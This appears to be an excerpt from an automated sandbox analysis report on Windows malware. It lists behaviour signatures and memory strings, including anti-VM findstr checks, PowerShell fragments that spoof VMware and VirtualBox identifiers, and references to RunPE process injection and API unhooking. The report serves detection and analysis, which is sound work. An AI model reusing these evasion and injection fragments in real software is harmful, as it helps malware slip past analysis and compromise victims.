Source: C:\Windows\System32\svchost.exe TID: 5580	Thread sleep count: 503 > 30
Source: C:\Windows\System32\svchost.exe TID: 5580	Thread sleep time: -50300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3896	Thread sleep count: 388 > 30
Source: C:\Windows\System32\svchost.exe TID: 3896	Thread sleep time: -38800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6468	Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 6468	Thread sleep time: -37900s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DD894 FindFirstFileExW,	21_2_000001F1197DD894
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F1197DDA18
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5D894 FindFirstFileExW,	21_2_000001F119D5D894
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F119D5DA18
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49D894 FindFirstFileExW,	22_2_00000166BE49D894
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_00000166BE49DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927D894 FindFirstFileExW,	37_2_00000279A927D894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_00000279A927DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92AD894 FindFirstFileExW,	37_2_00000279A92AD894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_00000279A92ADA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1ED894 FindFirstFileExW,	38_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21D894 FindFirstFileExW,	38_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5D894 FindFirstFileExW,	39_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8D894 FindFirstFileExW,	39_2_0000017D2DD8D894

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: cmd.exe, 00000015.00000003.1535784995.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1536278387.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1536898836.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1535847756.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1537050495.000001F119887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: svchost.exe, 00000031.00000000.1808026168.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2560040120.000002A769A42000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: cmd.exe, 00000015.00000003.1518550469.000001F119887000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000003.1518671399.000001F119887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" l>
Source: lsass.exe, 00000027.00000002.2556158078.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000031.00000002.2560040120.000002A769A42000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000002C.00000002.2604848286.000002287B013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000003.2523416101.000002A76AFB4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000000.1809108421.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: svchost.exe, 00000031.00000003.1841141732.000002A76A5D2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000000.1809108421.000002A76A110000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000031.00000003.2523416101.000002A76AFB4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000027.00000000.1746151220.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2550891542.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1757706895.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2541644884.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2543422273.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000000.1765464354.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2555397450.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.1769945734.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1780217992.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2539103684.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2559244462.000002A769A2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000031.00000000.1808270904.000002A769A9C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000027.00000002.2556158078.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: cmd.exe, 00000015.00000003.1517952698.000001F119832000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: cmd.exe, 00000015.00000003.1518550469.000001F119887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAATbTHawUmfcLAkpDTVWwYrBvRW=artsWith(':: 'AfGxgsffmPynRrkaaBfopYTVBXUiYbcfNbefYCi=ng[]]$qObbT.SpaJseWahXuVTWAzmKhplEdiHgShYWW=ieonim.oniIoniajZxexzXrSdyCDQTLTPqWfytPKPjfxCdJRBfcEC=iIoninonivonioALLUSERSPROFILE=C:\
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: svchost.exe, 00000031.00000003.1840165634.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000031.00000000.1810437566.000002A76A49A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000037.00000002.2545884887.000002517802B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 0000002D.00000000.1780082619.000001B94D400000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000027.00000002.2556158078.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000031.00000000.1811008667.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000028.00000002.2541644884.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000029.00000002.2625112996.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000031.00000003.1871573480.000002A76AE4F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_37-15457
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_37-15626

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Code function: 21_2_000001F1197DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

21_2_000001F1197DCD80

Source: C:\Windows\System32\cmd.exe

Code function: 21_2_000001F1197D1E3C LoadLibraryA,GetProcAddress,SleepEx,

21_2_000001F1197D1E3C

Source: C:\Windows\System32\cmd.exe

Code function: 21_2_000001F1197D1D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

21_2_000001F1197D1D30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F1197DCD80
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000001F1197D8814
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F1197D84B0
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F119D5CD80
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001F119D584B0
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000001F119D58814
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE498814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00000166BE498814
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE4984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000166BE4984B0
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000166BE49CD80
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_00000279A92784B0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A9278814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_00000279A9278814
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_00000279A927CD80
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_00000279A92A84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	37_2_00000279A92A8814
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_00000279A92ACD80
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_000001CA7D218814
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_0000017D2DD58814
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000017D2DD8CD80
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000017D2DD884B0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD88814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_0000017D2DD88814

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 34.2.powershell.exe.225536e9b98.13.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 34.2.powershell.exe.2255bd40000.15.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 33.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
